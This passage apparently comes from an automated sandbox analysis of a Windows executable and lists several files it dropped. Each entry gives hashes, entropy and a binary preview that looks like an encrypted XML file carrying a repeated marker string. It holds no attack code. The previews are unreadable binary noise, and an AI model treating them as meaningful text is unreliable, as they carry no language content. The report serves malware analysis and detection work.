              Preview:<?xml.h...k.$..Jc.5..E.A..Yt......}...........b..U....pw."_......B._lls^.+...J..p..M+gj.JvE.^....E..]...?<..5..,Q8Y........u..X.m........D.r...4..,D.|.v.$$_.eP3.]Un".2RDs.....!....-.I...:.).L..\..6...[.{..zpW.........^._...s8|.C..d.gq0...W..3f?.$....x]....^.)ej)..Y..F.-.;.4.3..u..B.c*.Z.uiaQ....u......(l.......pz.!'y8..3Ph?..p..<.?..v].yR..D.~.>d..m.V#..K...J..%".0..FK..\0YRR.I."4...G.l.. .......#.....,C...F......V....w.PE)<y...$w.'...)..].......;...Y .mM......kS...|.H.;.i%1..y.e..l..3{ ...5.SjC..OT.T......#A.'...\.W......=4.r.,..Q3..z.TA.<..9......2...".;...........}%..A.........(r...../...S.a...k....f...!.........*.j_.Ktp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1692
              Entropy (8bit):7.878970945462408
              Encrypted:false
              SSDEEP:48:8na6jqQzmjEoLUJu9H3xY2S3atFihJzVhBXNVEwikD:ca6jG/BBVS3TJrBXPE/w
              MD5:702309055D9932F21731FFD33281B6C4
              SHA1:C224F2E68868D6D22969244302F38E2FEC3391C5
              SHA-256:4AE054F03AE42EEBF76D59E3B73D3B89935E81E7AFC4E19F14C9E51F417D45A2
              SHA-512:1A0DA4F7A1B99B0AAB6CD4A0A61EF177CC82E0C4BDF484279CE21DD38B702AD2BEE6EE3110AB204E22BD8AB4869C3A7EDF21780F645665C493B46403AACFD689
              Malicious:false
              Preview:<?xmlg.Z...?WIr^OX..n..^...M.ti^]5..Zjv.Hl8.m@..f.(..M/#.^a\....9.B...[.=.KtO[Q~....T..j.t.F.-.jW!V.4.rV.KY&.UUe..6.........z.].H..}..2.U...H.M..S..\7.T.?.:G..h7.!....(.w.S.+....X.....93O.#Z.._.....'.......B. d1.".`..c..0...J.>...,....;C.......P.....?...j.LF._C.~Xg.Z.....M..8/n8.%.K...Bt'.].AO.........r.qU'.z...+..#....X...W...LK....|#6...7.....#.0...,gGK.F2.9...b.u..}.+*.-.g....5;...O.e?x..iK..I....F].-{..W>.5V..8._............6..7.....pR.5..J.....?...-.GR.).YWe.........p1i...(..?...P....Ol.P%.Y....t.G.......[A#...R.....]iT.r2#K..6.(.....4.;.....d!w. .w..f...a..0e}S.lN1.GG.o....[|...{..?a.m...................M._.ry.+i.d.0bmM.\....6....... ........./..z3).'^..]F..J........OZ..s....<.."s.z...M)......e:..|_.:.....;..)e...D*G....b...p.g.y.|'.R4f+....'.kZ...y......h.i.\Q...K.j-.y.8+.....1...a.,.h..Zqw. ..'.pk..O......k.a.R....f.y..FWi.......!$@8...,..^....(....N].I..F.v..n..a6..gB..{.....,..p.C.....f......[...69..J...........D.)..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):882
              Entropy (8bit):7.747891115249673
              Encrypted:false
              SSDEEP:12:2DByk0/WYGJGpG/PNiMp8SBHdfaqm2aTzc19YO5PW80kJ/365LhcEz0Te+BVcs2f:2JwWYxp6NBvOTzc19lht/sctaUmkMbD
              MD5:8BD58BA93A9091CEF405D8CE5254E1DC
              SHA1:C0D149E98A7CFE89D49A97555F430DF8B000046A
              SHA-256:577A5AA96DE8874EA52FCB1465889DFBE2900BC48724D4CAFB9DB689B3558985
              SHA-512:6795495FA4CB278D8353B250B7FE1DBB863089623A32E014270D07D2B1A2D6B228BAAB0EFAE2C9DEBAD5DE50070EFDBD0D49F190F99BB3F1D941B60CD270FBEB
              Malicious:false
              Preview:<?xml.d.|..u.~%.....|...#,@nQ...F.2.^...%.t.....p.T....l'.*..........U=.h{m.\.F:.@m.o......d....jp{h.ah.].M.8.......)..A.78....X..$L...4.......k...5n...&l.S<..[..z...sb..0k.5.t.{.llz.~0..9.|...W.b...w*4+NS^e.....0. Q:q........h........F.........C0))Fo...Q...`<....D..C.[.J...8..{c.........3N...~......0..N.......X$..TF../.....r..).]@..kI_].j.... .W.A.[g.-..}g.!D.L..........<~.OB......\.o..m....g\.X.l\..?%.J.......0.....y.{.4.x.*-KA..W..v...0QP1v..q..p....X.C...%...-_ Q-........BH...`........^6.N.,fA.f.M..........k.y.j.L<a..6..J+.....b6b...(...S.].].......~*..vu D....AOm......,...(..`H.....q.....(..S...r2.L?B..xu2.+W......b.A.M...ZZ.7iX.D..P1......)..}...@. o^....~..@.....S..L...C.U.......%.........(.=...\...\gZ..w...PQ.l.\].o#.w....A..*....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):953
              Entropy (8bit):7.732372016412842
              Encrypted:false
              SSDEEP:24:7AU7wE0Rlji4Zym4oNv8SO7z230ZIpqBCR4XNVLzvFbD:7AU5O+NDo98J7zjIpqBW8D
              MD5:6947F13E8AB4FEE4DA05D398EF4B0AA4
              SHA1:E67FE260587C1795F6E3F41FF27A8CABCABFFCB1
              SHA-256:F5AAD24B9A9AC5B280FB9531C0F8BC882C06D04D686D3348C33F1FDEB147A035
              SHA-512:67CBC2E7F3366CBA33974C2D62D52579F8A79F08FA67AE1060F61470CE81C642D5ED05E85E3A3F509407687A956EEF532B8E6B57D2AB3DB2C50E51AFBCC5171F
              Malicious:false
              Preview:<?xml...s.irt.....~^.k....C+..[(}qo...@...f4'<.B.H.v.S......L...@...L>...D.W.0...V.s|.+T.'T..).[m.......e`..u.zh.X%...%6F.."#b...Z.0.~Q.yjx.F...E... 6...fyF..s..U........X'......sSY....m.Q.UrM...{.Mj.y...E.E%.[k.C.D.0$.p].+[..X..t...W/.C.=...a......%0.rp.Mz.U{.A..p.b.B..<....6..[:nn..n.X.:np^5s.J....d'.l......x.8ep.....,vd._....{Q...R.q..yD.!=......c...)2..O....%s..Put.0...........{....F......(y.g...,v....:.o....<H....u."S.?.V...U.xDr_..X.o.c._i....#\.n.7.V.g..z:4`..........p....W.Z.X.."Sl.D.`]....).-.16b.....H..5.74....m........sa...5...E..).hIM.O..pbg...g[w......F0.b..{.Jf../....y.{R.I...EBtc?.HE.]....(......./.t0....+..36oS..1B..~z&....'N...F.2.H..x../......o.h.rrW...IT........"X.I.....FX...\..A...a....j..x..4Jhw.T.l.L.._F0..%B.~Y.3.t'(Swa..d..D.....[3N..p...XI..T...Q.<.cH..b...h.kV.?...QU.9AC'6...v.._.J.X.MG.[...U..7..U..T...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1139
              Entropy (8bit):7.803853527453828
              Encrypted:false
              SSDEEP:24:JKhzn8DCT7zyYO+XTgLwauk33zWb7MJSrPK4r9LmMbD:YV8OT7zr873zYK4pmGD
              MD5:6B65E67B601BF01EE306D774E50A1297
              SHA1:6515788B701CA3FD21D30D64C0859C8F6B9AF9E5
              SHA-256:4821D81E80F9F590B63CA958CC9C69B13FEA034BB88892587859B10A7371B975
              SHA-512:8F36CAC80E21D877B5254ABF63F5BB4681642EBDB3F504B6F0D1321D3A895C0916968E5C293776B4DFFDD7CFF985EC15581D24CE30E9BA4823FFA040FD0F010B
              Malicious:false
              Preview:<?xml1e..H{[y.......k.....x.{Z.(.,. .&...;.Y.g^..u..hj.'_4+.L....5..............h.H.9=.'...C.4yrl....n...,..B.<..._....mC.1[S..9..Y...T.o".3E^.. ..P..B^.. ..EjZx.jd.......,..Xyc.F..A...a..,...W..h@.....`....L.&..A..D.N......%..F.../..:...30.4.r5....*.*.h.,.....*.. .(..../s6..D(.%.....v..B.l.S....k.*'1k....x.X.A,...r]..vh..{G@.....s"T..\..G........N.qU.oK.v....t;.vFl.C"./%Z..=.Q...(Jh.sm.5.l..3{.9I.L..8d..1.Y...SW.B|-....;.F.s(..E.....)..i..v..CF..|.....Y..y\.>..J....K`.B..0....Cd.....'.ET. Y...6...o.-..4....41.S..k.j._.1.?B......H.Hkb\...<..ieA2....$..Z...V:i....jN^.P...........v...._..i...~A.&...}.+p.......v.0.<Zy..:n......>e..3......j..>......i..$.....$>.q..3.....|Y.... x.H}.u.C..?n.......0...pb.......<^..y.......(.M..gC....4...cV.q........2y|.A./.......fg.M.....&4V.v...l.........pW...%.jG.6{...oL].....!.L..._..X.....Z0..3.".....*;..hY}u/..R}%6.!.....G:....a:..jD...hL.......bU..V....k.....^Q.u..}IGr.-..%..1?.[..p._..7y....^
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1678
              Entropy (8bit):7.860781211503438
              Encrypted:false
              SSDEEP:48:akkYJIYCNOj2zR9xgjcVgkbAlMJ/9jzh6QmaGH/D:aHHMjQR9xycVLElI1V68GL
              MD5:400306CE4880E41856054AB1ED7EC801
              SHA1:AA847FB44A78F7D4540A3A983E4279CD736D5174
              SHA-256:0011D9B141B422826BEAFCE1EADFF492B51181CF5AABF0CEB5BEE942DDD50E05
              SHA-512:529303D5D0A37961CC79AA1E83EA967159EEE2BB9AC19C63FDD20525BB9D09D312E5C639AB6EDE40BB670E380413E8513B00EA2FADA59369B9B8D5E1C1893D42
              Malicious:false
              Preview:<?xml.x]...nz'f.:j...QMp....BA..?...X.'ad.v...@!]..H...G%J].....{..C.D... w...H?[A.A.......4<`A.l.x<"W....($.C...>@.LX.;.~6.Bo...g..,....w`.....:[......."r.LE.. .!....o......I.&...V..F ....f..(f.h...h+.................U..W&........A..N.R..f...A.OD..kn.53.]t.l..k.kD.b..|%D..@1...9...~P..mA..o?.H..$.o+....$..K.)1.....b...1K..'.<....o....R....x|.=........<..m.^.....6..]|#.+....].s.D;.....v.CO...d...$Y6.A...,....5ES..}:a..wX.} Cm.E.o...M.]".3U..^......".I(..v8....,.....mm.....}& v...3r.b....@..:.9ag)9.l"u5[j.....n....OX.W...w..+C.U..d.H...#~6..?...D.N......?.5.0p.../&..A..D.....T.......A,.h)CG)..?3Ik...n.J..g..J...r.( ...;r.?..\..JN3...... .).0.r...D7/..mY[.K.D.....C61.{.j....d.y.exsA f.....S....d......7.$....S.....sT.`.p7v..@...8...Wf.....J.ja!....J..9..Dk[.>...F...vL..G.y...1...........'....25k.ch.I.......T....1.U...Q..?H..].MkP...GB4V...D.....~W...<..999P\2J-..r...R#...~...G..j....x..` ...dW.o1..XG...c.]............iv..P.d.>.uP.p..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2075
              Entropy (8bit):7.909968970265903
              Encrypted:false
              SSDEEP:48:2BgyN8OtDZpE2R2AFynsmWLSsInZDcMwZ8/D:2JSmDZpkKYvVnSU
              MD5:2AA139590BD30E3BB96F3F991C9ECC21
              SHA1:8277BDD9756B279B27083DD7C6234AB37B975DD4
              SHA-256:18A17E1130B8E532FDF55E035818E5DE773D9E78DCED3B1A0BFD025166301F60
              SHA-512:12FCC7662C1A48FC0D3D3EF0DA024C2681203ADC820BBE514B1640349552046E789411F10F3B862027FF69DBB4D2463495E23CA1276DFE1477C9AF17F9DB5AD7
              Malicious:false
              Preview:<?xml.i..._..[!.Td.8..Q.t.r.8...._q.6..w?p.......^ZZ.c"M.Y.7L9`...Wn..h..T5=j.h.../..h..H!l.4..S.C...HZU..."|.:..h.().j;<...OZ'2S.;...a:D.....w...#..2z/..@)(~.j....%K.....%......e......h3)d......-.=..L;.&,..R...[TC.a..]...ut&..............r~9.%X.^.`..~..ZS."........./8...^;.,.f...,]O...h2TIg.k[D....=..J...*i.....quE.$.#... h.X......c@......*..uW.7.....i.......k%4c..R...p.2.o.@jz..|.t......m..bmG......F..;.Xzn .j...M.C..Z......Kx^..?Z.}._..)M......V..U..k..A....]<....;2..2..1v1...L.......".n.*...3W.P;,;:.S..l.zt.....W.1..xk)C'..'yB.._F>.S...@!..Q.....}$,.6..EZ..\.s..Vv......E....[.lppi..........5%l....e\........]^..'..H.m.L;.d....g.y!...$.d..!v..S....-...D.(.m...n.7r..Q.R....2..^QB.....=......k!...Q8s.\.)....Dh..g"........^Q.R.}v.(i*.N....t3KEn..B...\...k.[S..T.".......X..1V.jx-J97...#g5lf.....*JG.!.......1......M..>6i......'..n...v.=..\qv.g.b&.......q.+.{..7y.=}..#-........w..&.?[$..3....le.....TS.._.....m8.;hEZ.K..Xr.........
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2088
              Entropy (8bit):7.910348455831156
              Encrypted:false
              SSDEEP:48:zJ68bUrZfiHP08VBiZ/1WhwnsF9libVMMxYCTD:7ArZEP0+C/swnklibqQx
              MD5:57D043182550320F19C23FD64651EB77
              SHA1:4CEB6FD462DFCDF164C5F494E2917DD0C8C4BA77
              SHA-256:D58F5C7B444EB053D224D966B56ABC740C13A036F3AC4DF63387C06E1F41842B
              SHA-512:F31147B8BE900E6C714977DB8E544B80F58A5FF2B3613B553D0BF5F0E7C70E0B101C46F6915076ED15E733D2AA42C4A9D685DF1AA7F184C91116DADAEA3559D4
              Malicious:false
              Preview:<?xml.wr..q..K..ye.....e.....g...Dn.lC!..a.5z0\.#...N.A..Yn;......R!>..f......,....lV.Q..S.p..Z.`...l.....&CQ..r..{..a. .nO..N\....v`..~..7.A..?..Fk....8.a.s....AWA......04....-......\.DS.n.US.Z.....`w.<b\.[...@...&....\.'.t...]Q.o.o... ^..q....Y..+)3.I........$......BW.........q...I3[/..8...r..@..#.&.;n..V.zj6.............W....6.=-.X}...:..m...z...!.V)$..8X...z.IP...:.?.&....c.4.e.....lCi...a....ziO..Y.r.M>L....!..eK?I...v..X.....;O.....*....D.}gr{,..EC(Nk.......h.Po..Q.'J.i`..&gv.H....m.z.........P./..Dy.^c.U(.<.w.+.{..K...h(..},...?..p.~<...ec....U...y..3..V^h5W....~.G...,.57..-..)...O.('...... :.P.z}.p....X.`..5m0..Cg.......X.....E'2A.k.ee.(>...6...=[....Ab?...<.z6%^."B....h~.%.xK.....i.....Yc..QD...g.4.:M..^..f.k..j.Zc...ba.N..g...G`......'..tZH.P.T.....>.B8....>.%.E.O..*...l........Wr..S..L...t..b.!.S.p#.p..l$dUS......._....C$..=..s...U.n..........G1...|..]n....].K..f._.......J....'8a.l...W...Y)..3....#.%.....y../+......&G/....6.e.t
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1563
              Entropy (8bit):7.8650685034645
              Encrypted:false
              SSDEEP:48:IRVNUvWOGaZtg3m8dPLsk8u9CUsBI589n3NLD:IXNUvWOGag3m81skRIdBE8n3Nn
              MD5:B1D4BE7D4839B9DE06DF43F2474BFAAF
              SHA1:4BF1933694C98346A3EB13D5C07D9D1741242D4B
              SHA-256:2441360062673CF25C21C02CDF3EB7B5FEBEB0734CD4735EF7FCC90C4BC56A97
              SHA-512:F1EA505A712D5E6ACE95A5F0A4F477520D1AFAA6553B9E183CF890021666401DD165624BD4698F76D8694FAFF987E8A9604D5EEEF1ECA525D67BCBF3EA56B4BD
              Malicious:false
              Preview:<?xml...........x...Gm,..Y....s.Z.....^T..}.1uWfFJ..yWx.s...a..l..]......._...T|.....89.6x.d.tn..=h..`..0.B....d-.@p...sH....E./.}{ ..]q..4{.....].O.....M>.....L.?%,......f...Tf...>ZVP.......O..c...T...7...vK.i.g...;K.T .=c%..o!.xh../.i.....2K.?.^_.%..k..>.p...m....C%..Q..ao.....`.I.b.WNPx......#.^.]_.e..."4........3...b5..VN?..ll.-.Ox8.[.......y.........n...5..Xu.EN..V./Ej^v...;...B.8c...f...........LH..q.%4.q;..u.N[.D......ZmO....j..?..m..V.QVR......7.......gq.^}.v.O_.hMO..r.8Mg..=.ft.`.@.P?.?.d.3.....;.z.U....J...''...1..`.0.Z.).+/.......eO.....M.Bw...A.q...$..q.q0)"S/g......jX.D.t.j.*.=...R..:...rM..E.Y...Y.......I...t'.....k/...c.......$.B.!........30.Q.\[TM..'....s2.}.07zlo-!..S8..A^.v.S......q..X..E.../s6..c6j..b&h.b.p..zBJF.L.O.E..#.y{...,..5D..M...w.......+...5Z.i...\0L.'.....M......rK.l.9Z.d...JW.....X...R2.CJX<u!3.>G1.Gt....v.....XZ.4.-...al.ps..#.m.W.....qU..MN~..*/..c.]......H3~.......:.R.nh.2u.(.R....j...-.~.......
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.66802690939291
              Encrypted:false
              SSDEEP:12:sKUuWxhwIgmFKr1dIR4cSKi8Ds0fjY225TNU14ZH3IiaCzNuStyv+PXw3SJOukIX:NU3xyya12498Dlfj6TNU12XII5tyv+ft
              MD5:DB8D6167FBF084AF73285ADC766AA715
              SHA1:D4084D1E7BC21E891F716BE70D8150BC4F6DDA26
              SHA-256:E0AC8FB4AE2D93338C2C064FB0178B3521DB9C705C413E556BE3FFF000A28D45
              SHA-512:3FF3D95FDE88DCDDC0A0B55598B0E7F05B81F3CAE3B17EBC8F0E59A015DB5939452C353112A24DCF745D386E5DCFB0BACDF84F4A2C78F4A90CFA07E3F7E34985
              Malicious:false
              Preview:<?xml.....e...LWq.)JT..+VE.,.U.5.;.9..95...7q....R_#...-...0%..v|.%...|F.....!-....-|a.X.... ......~.s..@.:.[....4.;z.x.#...!.?..u.%....;........A..1.....d..o#...mW.B...rj....I... d#M...B<..T..@XY...>,......uj.4..h.j.m.....k2"..8.@.....[;..%I.Vz.*.j}`.....|F.S.f..2Q...q..-q.......L.6..a.|@...y.cTZT*.....ylr).w.9.k>.....TW...@.g..p.A!.$..'4.~...**.........d......LEs......T.7.....w8...,....c..bx......$...*..B2....7...:...].h..L.y.z..[u....I..G..cd..a..o.o..h8|...$.{I..f.<...Le..~.hT..yy....;.W..S.q.Yi.o...V..a.e.S.W.Y$....Q...k.!Y...m..Y...&.....R....Ga.3...x{../.&Yi..\6..Pv......=.Q....;.......1...\.+.j1.'4Tt.4.....4. .p..z..Tu.B.4L.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):785
              Entropy (8bit):7.667378696035576
              Encrypted:false
              SSDEEP:24:paazrKxGHbj6QMZ2TbzWElgOkpLJ0GZqdfUw+rubD:p5rKxG7j1FTvRaDLnOUwfD
              MD5:3892152BDB313730C1AD22B71DC8CEA0
              SHA1:5824D88732BC8E1BC3BD2E1FA443A0DBF622A6B8
              SHA-256:87FD5F34621DEEBDCA9ECFD54A61217540195D8993ABE56EA1D9AA5213AC8050
              SHA-512:E60B7A5FA494B7A492830491002BC5A5FE5137D0FDBE5C3548C72577F81D81C3B7AF00189AE49A6BBD3C0ADC060842018485663E34BD55564FD8C6AFC747BA9E
              Malicious:false
              Preview:<?xml.9XD.....d.....<....Wr.b...kc.....X.^...Hkj.Z..G..x..J._J(E.g.s0!G...i...........6....K....!..Q[..f&x..5A L.$.....n...b@.....>XD.R."^F....2.C...f...v...[....N....o..J{9?.......Z;.....\i...9I.ob".A.?,.....8...D...7T.)&...X..KO.e.2:..#.d.k..n.....f.q..d.....oi.....=A.....@.5.;.H.4:.r....L....B:'..k.`....G[.:.5.a|...@[..r...H..,.../bRZ..B"..9v4...(.P....1.B.<.r..Hf._.l_ .!.f...x.=..o..&....1.sv:...@5.....8e.,....|.m....0...&....7..'.-w$..@.h..x..e..v.).Q..!QgS0S.B`...$s..9W...}u.`.t../....lgR.W..3........t.c...$...k.(...iW..=..G...R..5....;...&.m.f..AR...A?.<..E..4....<3+...VX7G...I...1.0 ..wXI.V*.._...1.(....x...l.G.o.rDHf..G.o..N#7=..0...F..gT.....wd...q].gv..|.D.?xtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1333
              Entropy (8bit):7.858683638710299
              Encrypted:false
              SSDEEP:24:0czb+hp+nhGyXrrcmDvgFo+CWqwvUelcZGgRT8WLsS4hX6BFack0fs0tTJOZlKPX:Hb+ynBAmLjBWqNe4Gc8V6BEcvvTJelyD
              MD5:03539F441DE03F16C2054C1185595E56
              SHA1:A5BF6AB64416840253499CE5D4A6087C67843CBC
              SHA-256:9DCA76B87F46A9E48BAE6837CAF5FC43F3192DBDCC29DB488487F78469A6668F
              SHA-512:DE22FC4B8A59A21C5E4BB4F4C6E6543CC6443A83CFFC89A5F14ED654A885C9F5F7BFBB92BF5BF3DD9597101E11993F95FB3E3130EE3E52424CB96B1B118E8D0F
              Malicious:false
              Preview:<?xml....C{..IG...0].V..P.'....q..1..........tPD.)/+t@m.8......a5I..(e..n..u....<C.E...A+;-j.~.x.D}...IF..Ei....4 .....z.....W.....q!w.b.X.q........'.t4..I.w...KcMLK.{Ss.i.!..t...\.3..G".'..a.$.).p..2.`.q.Z...'....-9.'V. ...k.I..a..7._.C...8....x.^..[..+$..;..7U......K..IUz.4...'.....].*._[4...).$.Jy...Y...z.7oB.....;..Mc(Q[nB.W..f1.2..7\.>....D..+..M....4..W.-...5...i..f+..B...G..hl...`.z8....-..s.q..t..Rf.;...w>.Z"(|z...7b......C.Z..8..Z.-./....8|..o.F}.>:.T...=.PfQy.*.F...r..p`>g...._.\y...\.......hU_+..v.A.4.e.C.........l`..\....K......J........,W8G....<..V.e.q.....[.4. .o...pX.~(...#.N...O.0.Z..X.u/.ac.p'B..Ns...$.....].h...:tV.!mk..q$&.+...uD...".&^.....SOcM.9;.._.#K....EI.xz.S...........b.m.f...zq.8.....@..^....V.Y.'q.....C..Ke......@..V..|-.zw....Gg.V.>F^.'. .)....94..b.u.:i:.J...Q(mG.@..$#....w...m.]...RT.C.r.....'..j.6._...\.GX.....4....S.._..a 1.............z.wF{.......4GDQ..Md....).!..L...! n..A.....z.t..1A.I1....c.....xH..Nw..g..|.k
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):761
              Entropy (8bit):7.681688985346468
              Encrypted:false
              SSDEEP:12:77AVhgIovKkMwXvqSE54ekAxGNG1BcEP7uBxHATJptuoyJ9Y1ukIcii9a:Hc0pvNEfxUG1BcEP7uBKFptuoy9YSbD
              MD5:2B5E8E8A659EDAC9AFBF1FE61A2312BB
              SHA1:D5AFDB81959C9C120555D04B2B590160F7838793
              SHA-256:D39DBDF7C266C6C59A89CEA64279DB590AC1E0485D563A49DF77AC45063D17A5
              SHA-512:4DBC057FF022AFBA9A35283001E4587AE727E8B29BCEB3D7CC19E4ABDA7DE9A86AB5BF5C77EAF422F82D2CD7F1CA835769CAA0A61133B11CEAD3E73A393EAB27
              Malicious:false
              Preview:<?xml.6.......xM...L.v..R..B....ya1"'VBG`.v.L ...X=.3q .d..uu..w..!..B...%JhC.8.W........8.~26).[0#....qA...o....]MY....C.V...o..ou........*.].pM...m.6.:J..5NZs.........z..E.....W3.`G.0(yu.(..)7K......1..x..._..H..*..L.......hj.............u...Y......#X...L.!..o.1.J..\..b.v`....9Vk.Y.J8.6....[D.....T.......U.X.x....!........-8."..../..?.<\-......D.|.._1......j..SJ.9.5.k._Ua.6..).I..V;....NrH~Q!x...t.o..(.G..4DC...g.]...6XgZW*`p.....p.~.....l....].u.bC\.5...F......@..@..-.l.........F.D^MG.c.c..6.a.h.y........2..9.]....uB....g..A..ih.,..|.w..(6.N.<..f:8...v-..KxG.#.b.9...!9...qG..)9I.f.I....B..<..(..e.$.>v.G.7.G..2.w.!0.Q..$..z....S.."...O.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1152
              Entropy (8bit):7.798768883930881
              Encrypted:false
              SSDEEP:24:YIeNZKQ6tdCSztQgaRNqhuA7a8WXkBKSbgLI2i/ysogkC5Ukdnp1bD:YIerKQ6tgsSgSNqhuAjSiKaDd/4CND
              MD5:911225370549C7390CC48D077E37C1CC
              SHA1:2CA08B46B4E28A49788331F55D5CA950EA869E52
              SHA-256:67CFDCFB8C69146BAE1278631645C2F24EED5EFAC7AF70777AF6B1DA39AD136A
              SHA-512:1B55140B43FDC8B468045830CB644D78D4EFC75BBDE2144B3BBECA7FAB84C9EC8BF451B3B0D0E439DEAE92ABC55F207F989EE03A62A5134A6C3C7977D9593B6B
              Malicious:false
              Preview:<?xml.V6.i....".m.5..x...#.@....S....5|V.tw....3...yJR.h?_...AM......y-...X.j.).........y..[...7./C....n.7.l).3..v.LYgiCX..7...._%.%..!L.....9.->!%X.t.;....W..N...aD.......N..r[\.\.."n...U3s...d._...p..&$.....qR1Jzc..A.Z;.G[.>....k.j......$.....x..=.4..).....6Y..!....mE..EwQV....q...\.>#|..X...k.V..V....!'..#,......U.c.J."...0....\q.;...usp.........p....[b.".P....& ...O8..:.V.0......h.....\.M.V..%....[.H...Z.3.....z.5.5A..6y.n...*....P..yR...d>TS2M...K....I......%a.G...kq.@.L..E}.uA'..c?...N.>$.Z#.5XmC...:.....c|....l...".h...J..T.....Z>bq"RN........i.V..u......f...i7......y].R5!.O..-=Vn..jy..t.h2n5.........@1.s'#.hE>C..-uj..c<.,.l&...rO...&....X.0.G......n.A.vS7.....&..R..}..4a<."....WO._.....MA.kM.<....................+."...5..H.>.q.l.*.p....e..x.we..("..3~.SX.y5RrL......R....do...NPLa.)......d\M........Z.b'R|T.o.2..E.......>.Myq2...Wm...V.b.jr..S...AN......P.YZ.n..[.L......%............20.K.3.{..Y..=.)..b...?O......{.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1600
              Entropy (8bit):7.8747697406330115
              Encrypted:false
              SSDEEP:48:TlcFq6dI9MkQxFpEe2hZ7N6sxdsJHadiIpDD:gqgo8Fpj+57xdsJ6diIpP
              MD5:07BA34814BA4730991536D724972D8FE
              SHA1:ABD1BFE5F742901D74382A24D4B599EB3ED5D15B
              SHA-256:A7D1315A741BC7ADD6A8A78208203137A87F188D210C0DE647D1EB24D76FACAD
              SHA-512:4B3F7DAA3E75442188D7AC73AEDFD00FC1D57572DCF5008C57D8E294CE897D8C0957ADB126715C794FD0B8BDEF42A0DB86F63CDFB9B731340DF2ACC96940D527
              Malicious:false
              Preview:<?xml..S..|.....\..t..m...y.iv.Y....k...N...Z..y.".d.K\..F/.......LiY......k...w']N...z....J...1..,....../tU@..@z#6....V.V....J...:....m..P)...=....0..?..y.q......>u=..4..y2...|H.t...k.d.m.n........J....0.8b..s*&D9.j?:"k.?.h.r.Z.}_.....09.O...B..i.s.c.U.I>...c.;e..o...|..(.#.......`.;.Q..........^[.A.x......(....c.H......}.=q%[.S*]..=e.nm....f..[ih.t.`...*.................8.n.)...ZC....E.",2....W........!..(...a[B....||.!..J...h...q!.u..'.`V......Z.[\.%.(...2.K/i...m.n..'B..Z0...|..|E.5.C.S."RU.Jc..<.G.T.##....ey.&N.3....-..U)...'.]N(..g.,Mt_...>c.(..!(TO...<......(5..Q@.......h....z.Qye....k@.:9.mP._5.Z....& .4.........P`..+."...4...........=.O'..LE..YP.6.Y?-_=.&?...58L!.P.^...Y.>|.....,V...D..>....G.%I~.F$S..z~[..gly..G..'..@*..#...`..h.b.z#)GY.F.._....m.J.v..u...BWS.R@W.kK.....LOvCm8..i.*.j].x...lC.L}....Y...w.$......f..._.....r..f..M..S.c.|...s{..,+Sgy.l.BK..7a....#m.?v..{g.+..3..6....r....eS..V}.1....89....H....o.d|...r..k\.a...........
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2578
              Entropy (8bit):7.932223826007786
              Encrypted:false
              SSDEEP:48:z5M7zo5qrKmQPpBbwBTjBMyQBXTUNvW1mgmvHweaMpLqCYYqyGJ7gD:dqbfgdw1B2Bj8TgmvRdq9/yCw
              MD5:141B84AF7840ACD47197B5EC9DC80D2D
              SHA1:629368351BAD8072B0FAAAD41D386464E4A379BD
              SHA-256:76CE72C3602BA1CA16E20DC97B45D0BC275B285504444F176B7524C0017E546A
              SHA-512:C2FBE4289583261999B1A929E154FCF5160C5178BDFA7509094A6F18CB4BD0C8238FFF1EAA7D5BD8DFC674404CED7BD1D851839A540314DE80DE0EC6C11E5742
              Malicious:false
